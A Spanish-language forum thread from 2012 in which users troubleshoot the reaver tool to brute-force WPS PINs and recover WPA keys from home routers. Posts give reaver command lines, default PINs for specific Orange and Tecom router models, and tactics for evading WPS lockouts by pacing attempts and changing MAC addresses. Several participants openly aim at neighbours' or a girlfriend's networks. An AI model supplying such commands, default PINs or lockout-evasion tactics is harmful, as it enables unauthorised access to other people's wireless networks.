Publicado por: carasucia en Febrero 12, 2012, 11:16:32 am
WPS reaver te permite averiguar la llave WPA mediante brute force del PIN WPS.
Si tu vecino cambia su llave WPA tienes que cambiar tu también la llave para conectarte.
Habla con el para que te comunique la nueva llave cuando la cambia.


Primero que nada,gracias por contestarme.Tal vez no me he explicado bien.No es cuestion de que cambie el vecino la clave,se trata de que,una vez descubierto el PIN,le introduzco el comando correspondiente con reaver -i mon0 -b mac_routeur  -p XXXXXXXX y cada vez me da una clave distinta y de un intento a otro no pasan ni 20 segundos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Febrero 12, 2012, 12:17:53 pm
Va mejor con más detalles, si haces un copiado / pegado de lo que pasa en consola, es aún mejor.
Teóricamente te da el pass WPA, No tendría que fallar. Lo normal en el protocolo WPS es que se ex-cambie la llave entre routeur y cliente usando el algoritmo de  diffie-hellman.
Puede ser que al repetir enseguida el routeur use un mecanismo de auto-defensa y te mande una llave falsa (idea del decloacking adaptada al WPS).
Si no dices si la llave es buena o no, no podemos saber que pasa ni intentar averiguar que pasa...


Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Febrero 12, 2012, 13:53:39 pm
Va mejor con más detalles, si haces un copiado / pegado de lo que pasa en consola, es aún mejor.
Teóricamente te da el pass WPA, No tendría que fallar. Lo normal en el protocolo WPS es que se ex-cambie la llave entre routeur y cliente usando el algoritmo de  diffie-hellman.
Puede ser que al repetir enseguida el routeur use un mecanismo de auto-defensa y te mande una llave falsa (idea del decloacking adaptada al WPS).
Si no dices si la llave es buena o no, no podemos saber que pasa ni intentar averiguar que pasa...



Ninguna de las llaves wpa que me da cada vez que lo intento con reaver son buenas ya que con ellas no consigo conectarme a la red porque me dice  "error de coincidencia de claves de seguridad".Ahora mismo no puedo hacer un copiado / pegado de lo que pasa en consola pero basicamente es como te dije, pruebo el PIN que me ha dado reaver  como valido y me da una llave wpa diferente cada vez que no sirve para conectarse a la red.(He probado en otros routers y todos han ido perfectamente incluso teniendo el mismo tipo de encriptacion que este)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Febrero 12, 2012, 16:13:01 pm
Parece ser un mecanismo de defensa del routeur. Lo suyo sería que hagas el proceso con wireshark puesto, recuperas el ficherro cap y se lo manadas al team de WPS reaver.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Febrero 12, 2012, 21:48:21 pm
Parece ser un mecanismo de defensa del routeur. Lo suyo sería que hagas el proceso con wireshark puesto, recuperas el ficherro cap y se lo manadas al team de WPS reaver.
Perdona que te responda tan tarde.Me podrias explicar como hago lo de mandarselo al team de WPS reaver ?Gracias.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: xexu en Febrero 13, 2012, 01:35:27 am
ola me he fijado que los routers livebox de orange 00:19:70:xx:xx:xx cuando haces un ataque con wps reaver y estan en lock off,el ataque ya no continua,y si acabas el ataque y lo buscas con wash te aparece como wps locked on?que puede ser?como saltarterlo es el router de mi novia.
saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: alfon6 en Febrero 13, 2012, 15:59:16 pm
Hola.
Pués según todo lo expuesto, con un driver rtl8187 en bactrack4, un router mac 00:19:15 y con una señal wifi del 100% (en windows) y -33 (en linux) debería haber tenido un exíto rotundo al reunirse todos los requisitos, en cambio la realidad es bien distinta:
Sending EAPOL request
Recive timeout ocurred
Sending EAPOL request
Recive timeout ocurred
.................................
WPS transaction failed (code 0x02) Retrying last ping 12345670
Y así sucesivamente!
Probado con reaver 1.3 , 1.4 , etc.
Probado con Bactrack5 (con peores resultados al detectar chipset RTL8187BvE)
Y para colmo tampoco funciona con la NEWGUI`WLANJAZZTEL
En fin, al menos me consuelo..............

A mi tampoco!! Ni con backtrack 5, ni linux mint, ni wifiway!!  :'(  Tambien tengo la rtl8187 alfa

A ver si alguien nos lleva a la luz.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: db25 en Febrero 21, 2012, 10:52:41 am
A mi tampoco!! Ni con backtrack 5, ni linux mint, ni ***!!  :'(  Tambien tengo la rtl8187 alfa

A ver si alguien nos lleva a la luz.

Estoy exactamente igual que vosotros, tengo el router ubicado en la parte de arriba de la casa y no hay manera.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Febrero 21, 2012, 14:33:55 pm
Perdona que te responda tan tarde.Me podrias explicar como hago lo de mandarselo al team de WPS reaver ?Gracias.

Yo tambien llego tarde  :P, no había visto tu pregunta. Dirigete a la pagina oficial del proyecto:
http://code.google.com/p/reaver-wps/ y ahí te explican, hay también algo rollo foro.
Puedes también poner aquí una captura de pantalla del final con wirehark et reaver, puede ser interesante.
@ db25
¿Cúal es el modelo exacto de tu routeur y le versión del firmware?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: sniper1990 en Febrero 22, 2012, 21:21:40 pm
Comprobad tambien usando wireshark que la red tiene activada WPS o en este caso vosotros mismos que sois los dueños del router enteraos bien si WPS esta activado.No se me ocurre otra cosa ahora mismo,aparte de mirar el foro de problemas de reaver
Saludos!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Dj-van en Febrero 22, 2012, 23:36:13 pm
 Bueno muchachos, mi experiencia con Reaver ha sido de lo más desastrosa. Aquí posteo las pruebas que he realizado con una Alfa de 1 W AWUS036H con una antena omnidireccional de 9 dbi´s.

 Distro utilizada: (El innombrable) 3.4 con módulo Reaver 1.4 final. Módulo Reaver 1.3. Módulo Reaver 1.4 r62. Módulo Reaver 1.4 r102.

 Distro alternativa: Backtrack 5 R1 con la última versión del reaver 1.4 descargada con el comando Wash para detección de AP´s con WPS
activado (no Walsh como anteriormente).

 WLAN_XXXX  00:19:15   reaver -i wlan0 -b (mac ap) -c X -e (essid) -vv (verbose)

                                      Las redes comprobadas (por curiosidad), que han sido más de cuatro y menos de cinco, me arrojan siempre el mismo error:  Receive time out occured.     Power mejor encontrada:  -48.   Debería funcionar a la perfección.

 FTE-XXXX   84:A8:E4    Con reaver 1.4 final y empezando por el pin 12345670, ha saltado del 0 % al 90 % ya que (se supone que ha encontrado las cuatro primeros números) y ha pasado a comprobar la siguiente secuencia de 4 números.

 Empieza a subir el porcentaje hasta el 99,99 % y se queda en un ciclo sin fin sin entregar la clave. Por lo tanto, un pedazo de bug del copón.

 Ya sé que las redes Orange, no se pueden sacar, ya que cuando alcanzan el 0,15 % de comprobación de pines, bloquean a sus respectivos routers hasta que llegue el día en que se desbloquean. Tardan más o menos, pero se acaban por desbloquear.

 La información que lanzo al respecto es:  Orange-XXXX  00:19:70    Bloqueo a los intentos.
                                                                                  5C:33:8E     Bloqueo a los intentos.

 De redes Ono, no he podido comprobar ninguna, ya que por mi pueblo no opera esta compañía.

 Hasta aquí mis vivencias y pruebas con reaver, pero como véis más bien insatisfactorias. Iré probando y comentando en el foro.

 Por otro lado, como muchos de vosotros sabéis, soy partidario de no creer o preocuparme porque distro utilizar para este programa. Da igual si utilizamos (el innombrable), Backtrack 5r1, sistemas Linux y otras distros que se me escapan. 

 La clave, es tener todas las revisiones de reaver con sus librerías necesarias para que funcionen y punto pelota. Se descarga todo donde queráis y listo.

 Dentro de poco tendré la alfa negra AWUSO36NHA con chipset Atheros AR9271 bgn  630 mW y con este adaptador, haré más pruebas y ya os contaré como me va.

 A todos, saludoschau.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: namco04 en Febrero 22, 2012, 23:43:42 pm
A mi tampoco!! Ni con backtrack 5, ni linux mint, ni ***!!  :'(  Tambien tengo la rtl8187 alfa

A ver si alguien nos lleva a la luz.

Habeis mirao en walsh o wireshark que este activo el Wps? configure 0x02
porque que te falle en todas las distribuciones y con una tarjeta compatible es que no tiene activo el wps o que ya han actualizado el firmware del router que segun tengo entendido estan manos a la obra

[time]Febrero 22, 2012, 23:58:43 pm[/time]

 



 WLAN_XXXX  00:19:15   reaver -i wlan0 -b (mac ap) -c X -e (essid) -vv (verbose)

                                      Las redes comprobadas (por curiosidad), que han sido más de cuatro y menos de cinco, me arrojan siempre el mismo error:  Receive time out occured.     Power mejor encontrada:  -48.   Debería funcionar a la perfección.

 FTE-XXXX   84:A8:E4    Con reaver 1.4 final y empezando por el pin 12345670, ha saltado del 0 % al 90 % ya que (se supone que ha encontrado las cuatro primeros números) y ha pasado a comprobar la siguiente secuencia de 4 números.

 Empieza a subir el porcentaje hasta el 99,99 % y se queda en un ciclo sin fin sin entregar la clave. Por lo tanto, un pedazo de bug del copón.

 Ya sé que las redes Orange, no se pueden sacar, ya que cuando alcanzan el 0,15 % de comprobación de pines, bloquean a sus respectivos routers hasta que llegue el día en que se desbloquean. Tardan más o menos, pero se acaban por desbloquear.

 La información que lanzo al respecto es:  Orange-XXXX  00:19:70    Bloqueo a los intentos.
                                                                                  5C:33:0E     Bloqueo a los intentos.

 A todos, saludoschau.

¿tienes la tarjeta en modo monitor? porque wlan0 deberia ser mon0. Espero que no se te haya pasao ese fallo porque sino no me extraña que no te conectes a nada
Tambien deberias de saber que si se te a pasao ocultar la mac y estas atacando el router del vecino, a este se le va a quedar grabada y el dia que aprueben una ley de proteccion de contraseñas en telecomunicaciones como en Francia, si no esta ya activa, el vecino te podria sacar hasta los higados denunciandote.

Yo los principales fallos que me a dao el reaver a sido porque estaba algo lejos, recomiendo no probar en redes que pasan -70dB, la prueba de ello es que igual un dia iba genial como otro no se conectaba ni a tiros, de todas formas yo he hecho muchas pruebas y el reaver 1.3 me va mucho mejor que el 1.4.

lo del FTExxxx y otras redes orange, router livebox el pin por defecto es 12345670, yo si que he sacao alguna red Orange será cuestion de probar, probar comandos o echarle paciencia y horas de leer estos foros y el propio del reaver, encuentras cosas muy interesantes.


Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ZiFFeL en Febrero 23, 2012, 00:12:43 am
En breves actualizaré con los datos que he recibido y con algunos que pondré yo.

PD: Maripuri no se me ha olvidado ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Dj-van en Febrero 23, 2012, 07:55:48 am
Citar
¿tienes la tarjeta en modo monitor? porque wlan0 deberia ser mon0. Espero que no se te haya pasao ese fallo porque sino no me extraña que no te conectes a nada

 Sí esta en modo monitor. En vez de utilizar el comando airmon-ng, le pones airodump-ng wlanX y te fuerza al adaptador para entrar en modo monitor.

 Se ha comentado en diversas ocasiones, que el clonar la interface a mon0 con airmon-ng, le quita rendimiento al adaptador.

 Saludoschau.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: juanro114 en Febrero 24, 2012, 17:07:26 pm
ayuda porfavor  :(
he estado haciendo pruebas con mi router Orange-XXXx con reaver 1.4 me dice lo siguiente:
key cracked in 9 seconds
wps pin : 12345670
pero no veo la contraseña de mi router :( haber si me he saltado yo algun paso o algo
gracias!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pikomule en Febrero 24, 2012, 17:25:49 pm
te la deberia dar justo debajo de: wps pin : 12345670
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: juanro114 en Febrero 24, 2012, 17:29:18 pm
te la deberia dar justo debajo de: wps pin : 12345670
no me la da lo unico que me pone es :(
Nothing done, nothing to save!
no se k hago mal, haber esto es lo que puse yo
reaver -i mon0 -b xx.... -p 1234 -L -vv
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pikomule en Febrero 24, 2012, 17:47:10 pm
nose, creo que deberia funcionar asi:

reaver -i mon0 -b xx.... -p 12345670 -vv
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ZiFFeL en Febrero 24, 2012, 20:16:42 pm
Es cosa mía o el que llevaba el proyecto no cambia nada desde el 22 de Enero??
Parece que está un poco parado el tema de solucionar bugs y tal...
Qué opináis? Saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Febrero 25, 2012, 01:48:21 am
@Juanro
Tu has especificado un PIN de 4 dígitos. entonces recibes el M6 que es lo que obtienes después de haber roto el primer bloque de cuatro digitos del PIN
Es correcto pero no has acabado de crackear el PIN entero. Te falta la otra parte del PIN y es necesaria tener la para que el routeur te mande la llave.  Así que Reavaer ha efectivamente crackeado lo que le has pedido, el primer bloque del PIN, pero no hay resultado porque te falta la mitad del curro.
Pon el comando que te pone pikomule
El -L es para ignorar el hecho de quel AP tenga el WPS cerado.
En tu caso hemos visto que los routeurs de Orange activan después unos intentos el bloqueo del WPS.
Entonces no quitaría el L y iría lo más suave posible, espaciando los intentos.
@Jose46lopez
Hombre, no ta han puesto el caramelo en la boca, te lo han dado: Tienes un código libre, cada uno puede mejorar-modificar Reaver.
No hay sitio para las cosas secretas en el mundo de linux  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Dj-van en Febrero 26, 2012, 23:00:08 pm
 Bueno amigos, intentemos avanzar con el tema del Reaver.

 Puedo confirmar que las redes Orange-XXXX (00:19:70) (5C:33:8E) (C0:AC:54), se desbloquean a los tres o cuatro días de haber empezado el ataque.

 Ya dije que al llegar al 0,15% se activaba el bloqueo. Bueno, pasado el tiempo de desbloqueo, como ya tenemos la sesión salvada, podemos continuar por donde lo habíamos dejado.

 Es un poco coñazo y muy lento, pero en este caso, sería cuestión de tiempo bastante largo conseguir el pin y la clave.

 Con ésto quiero decir, que las redes Orange también son perfectamente vulnerables a reaver, y más rápido si se conoce el pin por defecto.

 Por otra parte, estaría bien saber si alguien que haya conseguido una clave con reaver de un router Tecom (00:19:15) WLAN_XXXX (que habrán sido pocos dados los comentarios desfavorables), que postee los datos siguientes para unificar
un poco los criterios:

 1- Que versión del reaver han utilizado para conseguirlo.
 2- Que distro se ha utilizado para tal fin.
 3- Que tipo de adaptador (marca-modelo, alcance) usb y muy importante, el chipset usado (Ralink-Atheros-Realtek)
 4- Comando utilizado en reaver para conseguirlo.
 5- Señal de recepción del Ap (-db).

 Así podremos universalizar todo un poco, ayudando a los compañeros del foro.

 Saludoschau.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ZiFFeL en Febrero 26, 2012, 23:26:14 pm
Yo con el router tecom a 3 cm de la antena lo pillé en seguida, pero es cierto que con señal -55 en adelante no he conseguido nada, me tira errores de time out y cosas así. Saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Compota en Febrero 28, 2012, 02:54:28 am
Las redes Orange no funcionan con wps reaver. El pin en cuestión se lo salta. de hecho los 001970 y los C0AC54 creo que vienen todos con 12345670 por defecto.. Un saludo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Largosfc en Marzo 01, 2012, 23:03:28 pm
señores porque cuando intento introducir la mitad de un pin, para que me salte al 90% el reaver y ahorrar tiempo como por ejemplo en

ono-xxxx A0:21:B7 pin 0634...

me llega asta el final y se queda en 99,99% volviendo a intentar el mismo pin mil veces y sin resultado? :S y no da la clave :S mil gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pikomule en Marzo 01, 2012, 23:36:59 pm
a mi me pasa eso con reaver 1.4, con 1.3 bien
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ZiFFeL en Marzo 02, 2012, 11:50:41 am
Puede alguien confirmar que cuando tienen clave WEP te devuelve el PIN pero no la clave?
Saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pikomule en Marzo 02, 2012, 13:13:22 pm
que yo sepa para WEP no hay WPS. Por que perder el tiempo con WPS para web si tienes varios ataques que saacn WEP en minutos?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Dj-van en Marzo 03, 2012, 14:07:48 pm

 
Citar
Puede alguien confirmar que cuando tienen clave WEP te devuelve el PIN pero no la clave?
Saludos

 Dice ZiFFeL.

 
Citar
que yo sepa para WEP no hay WPS. Por que perder el tiempo con WPS para web si tienes varios ataques que saacn WEP en minutos?

 Dice pikomule.

 Supongo que lo hace para hacer pruebas.  No seais malos para con la gente coñeee...  ;)

 Saludoschau.



Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ZiFFeL en Marzo 03, 2012, 16:33:22 pm
Y en que te basas para hacer esa afirmacion pikomule? Si lo digo es porque lo he probafo poniendo wep a un router con wpa y me daba rl pin pero no la key, asique no me digas que no hay router porque puede haberlos y no haber dado con ninguno... Primero prueba y luego afirma las cosas....
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ñanduti en Marzo 03, 2012, 16:53:14 pm
es cierto ZiFFeL lo que decis ahora te mando un mp de la experiencia mia ,creo que la ves pasada no te llego WEP que tiene wps :o salu2
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Marzo 03, 2012, 18:51:14 pm
En 2004 se reconocí la vulnerabilidad del WEP. En 2007 se creo el WPS tomando en cuenta la vulnerabilidad del WEP que ha sido dejado de lado (no por telefonica  ;D)
Entonces no se ha implementado la compatibilidad con cifrado WEP. Os dejo un par de citaciones y de links:

Citar
WPS requires support of Wi-Fi Protected Access (WPA) or WPA2, a super-set of the 802.11i security specification from the IEEE. Legacy products with WPA/WPA2 only can still join the network, but they have to go through the usual extra steps required today.

WPS will not work with wired equivalent privacy (WEP). If you have even just one device on the network that supports only WEP, you can't use WPS — WEP use forces the entire network down to that lowest common denominator.

http://www.wi-fiplanet.com/news/print.php/3652651

Citar
You cannot use WPS and WEP together. WEP was depreciated in 2004 since it was proven to have fatal security flaws. WPS was a method developed in 2007 to allow users to quickly add devices to their networks with little or no knowledge of computer networking. WPS uses WPA encryption.

http://www.ehow.com/info_12192867_can-wps-wep.html
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: keyhash en Abril 21, 2012, 18:29:12 pm
ola me he fijado que los routers livebox de orange 00:19:70:xx:xx:xx cuando haces un ataque con wps reaver y estan en lock off,el ataque ya no continua,y si acabas el ataque y lo buscas con wash te aparece como wps locked on?que puede ser?como saltarterlo es el router de mi novia.
saludos

Asi es correcto

A mi me ha pasado lo mismo

Hay que jugar con el numero de pins que envias por cada segundo
El ratio es 100 pins cada 10 segundos

Lo ideal seria un ratio de 1 pin cada 2 o 3 segundos

Saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Abril 21, 2012, 19:12:22 pm
Así te pilla también...
Probé con un delay de 15  y también te pilla. 30 igualito
Poner mas delay es una locura (para mi gusto)
Lo que note es que en ratos razonables entre cada intento, te bloquea después una decena de intentos, cuando estas alrededor de un 0,1 % del ataque.
Ni importa que le pongas más espacio entre los intentos
Entonces pensé usar el opción que te permite hacer unos cuantos intentos y parrar x tiempo.
Hize con 5 PINS y 180 segundos de pausa, para que quedemos a algo que no sea mas de 30 segundos para cada PIN,
También te pilla
Entonces piense:
"Hacemos 5-6 intentos, paramos, cambiamos la mac, hacemos 5-6 intentos etc..."
Al final con un script es muy rápido lo de cambiar la mac, podríamos llegar a un buen resultado así.
Pero también te pone el rate limit después de una decena de intentos.
Quedaba por probar un PIN=una MAC, pero me temo que entre una cosa y otra nos quedemos con un intento cada 15-20 segundos, me cuesta los mates pero con estos delay lo veo muy, muy largo, algo como meses para encontrar el primer bloque si no hay suerte...
Probé también el opción -w "imitar windows" y no cambia nada...
Algo se puede hacer, el hecho de que se traigan algunos PIN es una brecha, la cuestión es encontrar el cómo  ;D
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: keyhash en Abril 21, 2012, 21:15:30 pm
Así te pilla también...
Probé con un delay de 15  y también te pilla. 30 igualito
Poner mas delay es una locura (para mi gusto)
Lo que note es que en ratos razonables entre cada intento, te bloquea después una decena de intentos, cuando estas alrededor de un 0,1 % del ataque.
Ni importa que le pongas más espacio entre los intentos
Entonces pensé usar el opción que te permite hacer unos cuantos intentos y parrar x tiempo.
Hize con 5 PINS y 180 segundos de pausa, para que quedemos a algo que no sea de menos 30 segundos para cada PIN,
También te pilla
Entonces piense:
"Hacemos 5-6 intentos, paramos, cambiamos la mac, hacemos 5-6 intentos etc..."
Al final con un script es muy rápido lo de cambiar la mac, podríamos llegar a un buen resultado así.
Pero también te pone el rate limit después de una decena de intentos.
Quedaba por probar un PIN=una MAC, pero me temo que entre una cosa y otra nos quedemos con un intento cada 15-20 segundos, me cuesta los mates pero con estos delay lo veo muy, muy largo, algo como meses para encontrar el primer bloque si no hay suerte...
Probé también el opción -w "imitar windows" y no cambia nada...
Algo se puede hacer, el hecho de que se traigan algunos PIN es una brecha, la cuestión es encontrar el cómo  ;D

Gracias por aportar tus tests ; )

Puedes probar los siguientes PINs :

Todo unos
Todo doses
. . .

Pin ascendente
1234 . . .

0123 . . .

Pin desc "descartado"


Pruebalo y nos cuentas o si lo prefieres enviame MP

¿Tambien interesaria saber cuanto tiempo dura ese bloqueo para una MAC ?

600 seg
1200 seg
1 hora
1 dia
hasta que se hace reset al router


Saludos,
keyhash


Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Abril 22, 2012, 02:50:24 am
Citar
Puedes probar los siguientes PINs :

Todo unos
Todo doses
. . .

Fíjate, así hace reaver solo... 

Citar
Pruebalo y nos cuentas o si lo prefieres enviame MP

Prefiero contarlo a tod@s  ;)
Desgraciadamente no tengo nada nuevo que contarte acerca de conseguir "saltarse" el bloqueo del WPS...

Citar
¿Tambien interesaria saber cuanto tiempo dura ese bloqueo para una MAC ?

El problema es justamente que no va por mac, sino solo con cambiar la mac bastaría para burlar el sistema de bloqueo. Lo probé y no funcionó (con 5 pins, cambio de mac,5pins etc.)
El bloqueo es muy largo y es del wps en general, hablamos de algo cómo 24 horas para los 00:19:70...
También otros routeurs con essid typo ONO_XXXXXX tienen un sistema de bloqueo similar, no lo burléis con un cambio de mac y se parra todo en cuanto habéis probado unos cuantos PIN.
Con las OnO el bloqueo dura mucho menos, no llega a la hora.





 
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pompiro en Abril 22, 2012, 17:23:33 pm
Una pregunta
¿Existe algún programa que haga un scan y te muestre el pin WPS por defecto de una red?
He visto por este foro, uno llamado WPSig, en ningún momento he llegado a instalarlo bien en 3 distribuciones, siempre salen errores. Y otro con el wireshark que le salía información del pin al dar un scan.
Gracias

P.D: Se que hay un apartado para recolectar pines de wpa, pero preguntar no mata :)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Abril 22, 2012, 18:31:09 pm
WPSIG funciona para ciertos routeurs pero nunca se trato de revelar el PIN WPS sino información cómo el serial, modelo del routeur.
El proyecto parece abandonado...  :-\

Citar
Y otro con el wireshark que le salía información del pin al dar un scan.

No he visto nada por la red sobre tal programa. Es un poco raro esto de "programa que utiliza wireshark", ¿que quieres decir?

Citar
¿Existe algún programa que haga un scan y te muestre el pin WPS por defecto de una red?

Que yo sepa no. Pero tienes la lista de los PIN por defecto del sitio de WPS reaver. Por lo que es del territorio esdpañol, la verdad es que no he visto otro hilo publico cómo el que tenemos en ninguna parte...
A parte de los 5-6 patrones que tenemos aquí no se dónde podrías encontrar información cómo la que tenemos... tampoco un programa
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pompiro en Abril 23, 2012, 14:09:10 pm
Gracias por resolver mis dudas  ::)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Silverion en Abril 25, 2012, 23:21:44 pm
yo ataco con reaver una WLAN_XXXX de mac 00:19:15 y segun he mirado en otros temas, el pin por defecto es 12345670, pero ahi algo que no me cuadra, me salta un error llamado

WPS transfer failed, trying to lasted pin o algo asi

yo tengo una tarjeta approx high power wireless-n usb adapter y en el airmon-ng lo detecta como Ralink R2870/R3070 rt2800usb, es compatible esta tarjeta con reaver?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pinty_102 en Abril 26, 2012, 00:24:16 am
antes de nada decirte que el router tecom no lleva activado el wps de fabrica  ;)

partiendo de esa base te va a dar lo mismo la targeta que utilices

aun llevando el wps enchufado tienes que colocarle al router el pin , pues si no le as puesto pin a los 2 minutos se desactiva el wps

ahora haciendo lo que te dicho el router es vulnerable en segundos

PD : cuento la experiencia del mio  ;)

@Silverion en 2 palabras lo que te dice reaver que no esta enchufado wps

salu2
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: HAGAREN en Abril 26, 2012, 00:47:34 am
yo ataco con reaver una WLAN_XXXX de mac 00:19:15 y segun he mirado en otros temas, el pin por defecto es 12345670, pero ahi algo que no me cuadra, me salta un error llamado

WPS transfer failed, trying to lasted pin o algo asi

yo tengo una tarjeta approx high power wireless-n usb adapter y en el airmon-ng lo detecta como Ralink R2870/R3070 rt2800usb, es compatible esta tarjeta con reaver?

Yo tengo la misma tarjeta que tu,y ultilizo el reaver con wifiway,y si es compatible,algunas veces con resultados muy buenos en el reaver,se asocia enseguida con el otro router y este le devuelve los paquetes sin problemas,y otras veces intentandolo con el mismo router no hay manera,le cuesta asociarse y me salen varios errores inclusive el que dices tu,esto puede ser por muchas cosas ,pero mas que de la tajeta yo pienso que es del router al que estan atacando,lo del pin por defecto no tiene nada que ver,lo importante es que el router al que tu estas atacando te devuleva los paquetes (M1 y M2, M3, M4,)y el reaver vaya probando pins diferentes cada vez,cuando los 4 primeros digitos esten bien veras un M5 Y M6 y cuando haya dado con el pin correcto veras un M7

PD:Si instalaste el programa que venia con el cd de los drivers (el Ralink Wireless Utility)echale un ojo a la pestaña WPS,alli veras las redes que tienen WPS e informacion de las mismas,en definitiva que puedes hacer lo mismo que con el reaver

SALUDOS
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: monry en Julio 28, 2012, 14:18:33 pm
yo consegui ayer el pin y la contraseña con reaver y la wifi del portatil ar9285
pero cuando probe a conectar me dice q eror de coincidencia de clave
asi q no se me ocurre otra cosa para comprobar q sacar el hanshake e introducir la clave en un diccio y pasarselo
para comprobar q la clave es correcta
sin embargo sigo sin poder conectar no se si sera cuestion de q tenga filtrado de mac
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: vcx77 en Julio 28, 2012, 14:55:01 pm
monry,a mi eso me ha pasado con algunas claves wpa desde windows,instalando el driver de un adaptador usb y poniendo la clave desde la inteface del adaptador no habia ningun problema,prueba a ver que pasa.un saludo

[time]Julio 28, 2012, 14:57:12 pm[/time]
la clave era correcta pero me decia lo mismo,no se por que,pero haciendo lo que te apuntado,se conectaba sin problemas

Julio 28, 2012, 15:02:45 pm
en windows 7 te hablo,si es en xp no tengo ni idea.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: chus en Julio 31, 2012, 18:26:00 pm
yo consegui ayer el pin y la contraseña con reaver y la wifi del portatil ar9285
pero cuando probe a conectar me dice q eror de coincidencia de clave
asi q no se me ocurre otra cosa para comprobar q sacar el hanshake e introducir la clave en un diccio y pasarselo
para comprobar q la clave es correcta
sin embargo sigo sin poder conectar no se si sera cuestion de q tenga filtrado de mac

no se qué windows usas, pero prueba a borrar la red de la lista de redes preferidas.

un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kurgy en Agosto 17, 2012, 16:36:55 pm
Corre por la red el Reaver Pro, lo descargue ayer es una distro de Ubuntu con un interface gráfico para el reaver, que permite guardar logs de los ataques para reanudarlos después.

Por lo demás es idéntico al reaver 1.4, está diseñado para funcionar con un chipset realtek, para que te funcione con otro chipset tienes que activar el modo monitor desde un terminal y arrancar el wash.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Agosto 17, 2012, 17:06:28 pm
Cierto.
Has muy bien hecho en no poner link porque no se permite en este forum vincular hacía descargas ilegales y crack
Esta bien que recuerdas que se trata solo de una interfaz grafica para el manejo de reaver y que se basa en el reaver 1.4 revisión no se cuanto que tenemos todos.
Por mi parte siento decir que me parece despreciables y de una estupidez sin limites por parte de estos lammers.
El código es publico el set "reaver-pro" es una forma de ayudar a la peña que nos han ayudado a todos y han pasados horas investigando y creando reaver
Luego no llorar porque la peña acaba disgustada y los proyectos libres como reaver paran.
Desde aquí un gran (http://portalhacker.net/Smileys/classic/andatea.gif)  a esta banda de -bip- (hablo de los que crackearón y difundieron la interfaz grafica que se encuentra en el package reaver pro  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kurgy en Agosto 18, 2012, 12:22:06 pm
antes de nada decirte que el router tecom no lleva activado el wps de fabrica  ;)

partiendo de esa base te va a dar lo mismo la targeta que utilices

aun llevando el wps enchufado tienes que colocarle al router el pin , pues si no le as puesto pin a los 2 minutos se desactiva el wps

ahora haciendo lo que te dicho el router es vulnerable en segundos

PD : cuento la experiencia del mio  ;)

@Silverion en 2 palabras lo que te dice reaver que no esta enchufado wps

salu2

No entiendo bien, quieres decir que si se reinicia ese router tienes 2 min para hacer el ataque antes de que se desactive?
A mi tambien me sale una red tecom 00:19:15" que dice que tiene el wps activado, pero tambien da error..
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: gooolden en Agosto 19, 2012, 23:16:01 pm
